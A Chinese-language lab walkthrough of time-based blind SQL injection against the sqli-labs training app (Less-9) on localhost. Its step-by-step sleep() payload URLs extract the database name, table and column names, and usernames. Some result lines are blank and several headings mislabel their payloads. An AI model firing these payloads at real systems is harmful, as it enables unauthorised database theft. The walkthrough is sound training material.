sql盲注之延迟注入的用法

1. 查看数据库长度

   http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length(database())>7,sleep(5),1)-- +

 

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length(database())>8,sleep(5),1)-- +

 

2. 查看数据库第一个个字符

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and  if(ascii(substr( database(),1,1) )>114,sleep(5),1)-- +

 

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr( database(),1,1) )>115,sleep(5),1)-- +

 

第二个字符

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr( database(),2,1) )>101,sleep(5),1)-- +

 

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr( database(),2,1) )>100,sleep(5),1)-- +

 

获得数据库

 

3. 获得表名长度

   第一个表的长度

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))>5,sleep(5),1)-- +

 

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))>6,sleep(5),1)-- +

 

   第二个表的长度

 http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select table_name from information_schema.tables where table_schema='security' limit 1,1))>8,sleep(5),1)-- +

 

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select table_name from information_schema.tables where table_schema='security' limit 1,1))>7,sleep(5),1)-- +

 

4. 查看第一个表的第一个字符

 http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(5),1) --+

 

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101,sleep(5),1) --+

 

第一个表的第二个字符

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))>109,sleep(5),1) --+

 

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))>108,sleep(5),1) --+

 

5. 查看第二个表的第一个字符

  http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>114,sleep(5),1) --+

 

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>113,sleep(5),1) --+

 

第二个表的第二个字符

  http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))>101,sleep(5),1) --+ 

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))>100,sleep(5),1) --+

 

查看第四个表的第一个字符

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))>117,sleep(5),1) --+

 

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))>116,sleep(5),1) --+

 

最后获得的表有

 

6. 查看users表的长度

  http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select column_name from information_schema.columns where table_name='users' limit 0,1))>7,sleep(5),1) --+  

 

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select column_name from information_schema.columns where table_name='users' limit 0,1))>6,sleep(5),1) --+   

 

7. 查看users表中列的长度

    第一列的第一个字符

  http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>117,sleep(5),1) --+

 

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>116,sleep(5),1) --+

 

第二列的第一个字符

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1))>112,sleep(5),1) --+

 

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1))>111,sleep(5),1) --+

 

获得列表为：username，password

8. users中用户名的长度。

  http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(length((select username from users limit 0,1))=4,sleep(5),1) -- +

 

第一个用户名的第一个字符

 http://127.0.0.1 /sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select username from users limit 0,1),1,1))>68,sleep(5),1) --+

 

http://127.0.0.1 /sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select username from users limit 0,1),1,1))>67,sleep(5),1) --+

 

最后获得用户名密码是：Dump